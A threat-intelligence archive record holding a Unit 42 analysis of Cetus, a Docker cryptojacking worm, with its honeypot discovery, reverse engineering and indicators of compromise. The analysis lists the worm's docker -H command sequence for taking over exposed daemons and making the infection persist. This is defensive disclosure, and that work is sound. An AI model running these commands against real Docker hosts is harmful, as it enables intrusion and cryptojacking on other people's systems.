{
	"id": "dc35e1e3-c244-465f-8f78-617c26a6299b",
	"created_at": "2026-04-06T01:29:34.975406Z",
	"updated_at": "2026-04-10T13:12:12.11201Z",
	"deleted_at": null,
	"sha1_hash": "2b8715b05b7b1562aa19294e2cbb298a054de09d",
	"title": "Cetus: Cryptojacking Worm Targeting Docker Daemons",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 561661,
	"plain_text": "Cetus: Cryptojacking Worm Targeting Docker Daemons\r\nBy Aviv Sasson\r\nPublished: 2020-08-27 · Archived: 2026-04-06 00:39:21 UTC\r\nExecutive Summary\r\nUnsecured Docker daemons have been known to security professionals as a major threat since the early days of containers.\r\nUnit 42 recently wrote about Graboid, the first-ever Docker cryptojacking worm, and about unsecured Docker daemons. I\r\nconducted additional research by setting up a Docker daemon honeypot in order to examine how things look for an average\r\nDocker daemon in the wild and to learn whether the shift to the cloud caused by COVID-19 increased the prevalence and\r\nsophistication of targeted cloud attacks.\r\nThis blog will detail the discovery of Cetus, a new and improved Docker cryptojacking worm mining for Monero that was\r\nfound in a Docker daemon honeypot we created. Cetus was created by TeamTNT, a group that's been attacking AWS and\r\nDocker daemons.\r\nPalo Alto Networks customers running Prisma Cloud are protected from this through the Prisma Cloud Compute host\r\ncompliance protection, which alerts on an insufficient Docker daemon configuration and suggests a solution.\r\nThe Honeypot\r\nTo conduct the research, I set up isolated, restricted Docker daemons and logged all the traffic coming through for the month of\r\nMay. During that period of time, I witnessed various kinds of attacks, delivering anything from botnets to worms, and most\r\nof them were for the purpose of cryptojacking, especially for Monero.\r\nOne of the most frequent attacks captured my attention because it had a potential pattern of a worm. Unlike other attacks,\r\nhere the honeypot was attacked from many different unsecured Docker daemon instances. According to my honeypot\r\ndeployments and other research projects on container security, it is not common to see worms targeting unsecured Docker\r\ndaemons. 
I decided to analyze the payload and determined that this was a new Docker worm: each instance of the malware\r\nattempts to discover and infect other Docker daemon instances, both on the local network and outside it.\r\nHow Cetus Works\r\nIn Greek mythology, there are stories about a whale-like creature that looks innocuous but is actually a sea monster that\r\nwreaks havoc wherever it goes. The name of that creature is Cetus. Since the malware is aiming for Docker daemons and\r\ntrying to disguise itself as legitimate binaries, I decided to name it Cetus.\r\nCetus disguises itself by impersonating a legitimate binary that is frequently used in Docker environments called Portainer.\r\nPortainer is a user interface (UI) management tool that offers a convenient way to manage multiple Docker environments.\r\nWhile taking over a new machine, Cetus copies itself to the victim and deploys an XMRig cryptominer payload. Cetus\r\ndisguises the cryptominer as a different, seemingly legitimate binary called docker-cache. It looks like a legitimate name but, unlike\r\nPortainer, it is not the name of a genuine binary.\r\nhttps://unit42.paloaltonetworks.com/cetus-cryptojacking-worm/\r\nPage 1 of 7\n\nFigure 1. Cetus life cycle.\r\nThe infection mechanism is simple and effective. Cetus uses Masscan to randomly scan subnets for Docker daemons and,\r\nonce it finds one, it tries to spread by sending requests to the daemon’s REST API. To add insult to injury, Cetus crafts these\r\nrequests by using the Docker command line interface (CLI) tool.\r\nThe attack flow of Cetus is described in Figure 1. 
Specifically, the commands that Cetus runs are:\r\nCheck that the daemon is exploitable and not already infected:\r\ndocker -H \u003cvictim\u003e ps -a\r\nRun a new container of ubuntu:18.04 from Docker Hub:\r\ndocker -H \u003cvictim\u003e run -dt --name \u003cname\u003e --restart always ubuntu:18.04 /bin/bash\r\nUpdate the package manager lists:\r\ndocker -H \u003cvictim\u003e exec \u003cname\u003e apt-get -yq update\r\nInstall Masscan and Docker through the package manager:\r\ndocker -H \u003cvictim\u003e exec \u003cname\u003e apt-get install masscan docker.io\r\nCopy the malicious portainer and docker-cache binaries to the container:\r\ndocker -H \u003cvictim\u003e cp -L docker-cache \u003cname\u003e:/usr/bin/\r\ndocker -H \u003cvictim\u003e cp -L portainer \u003cname\u003e/usr/bin/\r\nAdd Cetus to /root/.bash_aliases. This causes Cetus to run every time the container restarts or root starts a bash\r\nsession:\r\ndocker -H \u003cvictim\u003e exec \u003cname\u003e bash --norc -c `echo /usr/bin/portainer \u003cname\u003e \u003e/dev/null` 2\u003e/dev/null \u0026\r\nRestart the container in order to run Cetus:\r\ndocker -H \u003cvictim\u003e restart \u003cname\u003e\r\nReverse Engineering Cetus\r\nReverse engineering Cetus was easy and fast since it doesn’t use any anti-debugging or obfuscation techniques and even has\r\nsymbols. On the other hand, this was not the case with the miner. XMRig is one of the most widely used cryptominers\r\nin cryptojacking attacks, and security tools therefore treat it as a virus. In order to deceive them in this attack, it was\r\nfully obfuscated, which made the reverse engineering process harder.\r\nIn addition, we can conclude the malware is new because it uses XMRig 5.5.3, which was released on Feb. 2, 2020.\r\nCetus’s architecture is simple. It contains two main functions:\r\nminer_start and scan_start.\r\nFigure 2. 
Cetus main function.\r\nThe function miner_start is straightforward. It opens /var/log/stmp.log in order to log Cetus’s actions, and after that, it runs\r\nthe XMRig cryptominer, which utilizes the machine’s CPU in order to mine Monero.\r\nThe function scan_start is much more interesting and executes the core malware functionality. It picks a random 16-bit\r\nsubnet and runs Masscan in order to scan the subnet for Docker daemons on port 2375. When it finds a daemon, it starts the\r\ninfection process using the Docker CLI tool that was already downloaded.\r\nAn interesting thing about the malware is that every time it infects a Docker daemon, it gives the container a different\r\nname. It has two lists of eight names each, and it randomly picks a name from each list and concatenates them.\r\nFigure 3. Malicious container names.\r\nThen Cetus will run the miner with the name as an argument. The miner will identify itself to the mining pool with this\r\nname and send the actor information about the mining. That will allow the attacker to classify each miner and create\r\nstatistics about the miners and the campaign through the mining pool API.\r\nWe can conclude from this and the logging mechanism that the operator of this worm wants to monitor everything carefully.\r\nConclusion\r\nMalware targeting containers will gradually become more complex as attackers understand the potential of the cloud. This is\r\nthe second Docker cryptojacking worm documented by Unit 42 after Graboid. In addition, we were able to link Cetus to\r\nTeamTNT, a group that's been attacking AWS and Docker daemons, which used the same Monero wallet address as Cetus. 
We\r\nconclude that there is a growing trend of sophisticated attacks on the cloud.\r\nPalo Alto Networks customers running Prisma Cloud are protected from this through the Prisma Cloud Compute host\r\ncompliance protection, which alerts on an insufficient Docker daemon configuration and suggests a solution.\r\nFigure 4. Prisma Cloud host alert\r\nIndicators of Compromise\r\nFiles\r\nFilename SHA256\r\ndocker-cache e03cf2af46ad1fe590e63f0020243c6e8ae94f074e65ace18c6d568283343dac\r\nportainer b49a3f3cb4c70014e2c35c880d47bc475584b87b7dfcfa6d7341d42a16ebe443\r\nTable 1. Malware hashes\r\nMining Information\r\nPool\r\npool.minexmr.com:443\r\nPayment Address\r\n85X7JcgPpwQdZXaK2TKJb8baQAXc3zBsnW7JuY7MLi9VYSamf4bFwa7SEAK9Hgp2P53npV19w1zuaK5bft5m2NN71CmNL\r\nContainer Names\r\nbaleful_gormmet\r\nbaleful_obelus\r\nbaleful_agelast\r\nbaleful_amatorculist\r\nbaleful_peristeronic\r\nbaleful_hirquiticke\r\nbaleful_oxter\r\nbaleful_quire\r\nboorish_gormmet\r\nboorish_obelus\r\nboorish_agelast\r\nboorish_amatorculist\r\nboorish_peristeronic\r\nboorish_hirquiticke\r\nboorish_oxter\r\nboorish_quire\r\nadroit_gormmet\r\nadroit_obelus\r\nadroit_agelast\r\nadroit_amatorculist\r\nadroit_peristeronic\r\nadroit_hirquiticke\r\nadroit_oxter\r\nadroit_quire\r\nfecund_gormmet\r\nfecund_obelus\r\nfecund_agelast\r\nfecund_amatorculist\r\nfecund_peristeronic\r\nfecund_hirquiticke\r\nfecund_oxter\r\nfecund_quire\r\nlimpid_gormmet\r\nlimpid_obelus\r\nlimpid_agelast\r\nlimpid_amatorculist\r\nlimpid_peristeronic\r\nlimpid_hirquiticke\r\nlimpid_oxter\r\nlimpid_quire\r\nrisible_gormmet\r\nrisible_obelus\r\nrisible_agelast\r\nrisible_amatorculist\r\nrisible_peristeronic\r\nrisible_hirquiticke\r\nrisible_oxter\r\nrisible_quire\r\nverdant_gormmet\r\nverdant_obelus\r\nverdant_agelast\r\nverdant_amatorculist\r\nverdant_peristeronic\r\nverdant_hirquiticke\r\nverdant_oxter\r\nverdant_quire\r\nzealous_gormmet\r\nzealous_obelus\r\nzealous_agelast\r\nzealous_amatorculist\r\nzealous_peristeronic\r\nzealous_hirquiticke\r\nzealous_oxter\r\nzealous_quire\r\nSource: https://unit42.paloaltonetworks.com/cetus-cryptojacking-worm/",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"Malpedia"
	],
	"origins": [
		"web"
	],
	"references": [
		"https://unit42.paloaltonetworks.com/cetus-cryptojacking-worm/"
	],
	"report_names": [
		"cetus-cryptojacking-worm"
	],
	"threat_actors": [
		{
			"id": "f809bfcb-b200-4988-80a8-be78ef6a52ef",
			"created_at": "2023-01-06T13:46:39.186988Z",
			"updated_at": "2026-04-10T02:00:03.240002Z",
			"deleted_at": null,
			"main_name": "TeamTNT",
			"aliases": [
				"Adept Libra"
			],
			"source_name": "MISPGALAXY:TeamTNT",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		},
		{
			"id": "c3ca592f-0669-49bd-ab5c-310007ab2fb4",
			"created_at": "2022-10-25T15:50:23.334495Z",
			"updated_at": "2026-04-10T02:00:05.264841Z",
			"deleted_at": null,
			"main_name": "TeamTNT",
			"aliases": [
				"TeamTNT"
			],
			"source_name": "MITRE:TeamTNT",
			"tools": [
				"Peirates",
				"MimiPenguin",
				"LaZagne",
				"Hildegard"
			],
			"source_id": "MITRE",
			"reports": null
		}
	],
	"ts_created_at": 1775438974,
	"ts_updated_at": 1775826732,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/2b8715b05b7b1562aa19294e2cbb298a054de09d.pdf",
		"text": "https://archive.orkl.eu/2b8715b05b7b1562aa19294e2cbb298a054de09d.txt",
		"img": "https://archive.orkl.eu/2b8715b05b7b1562aa19294e2cbb298a054de09d.jpg"
	}
}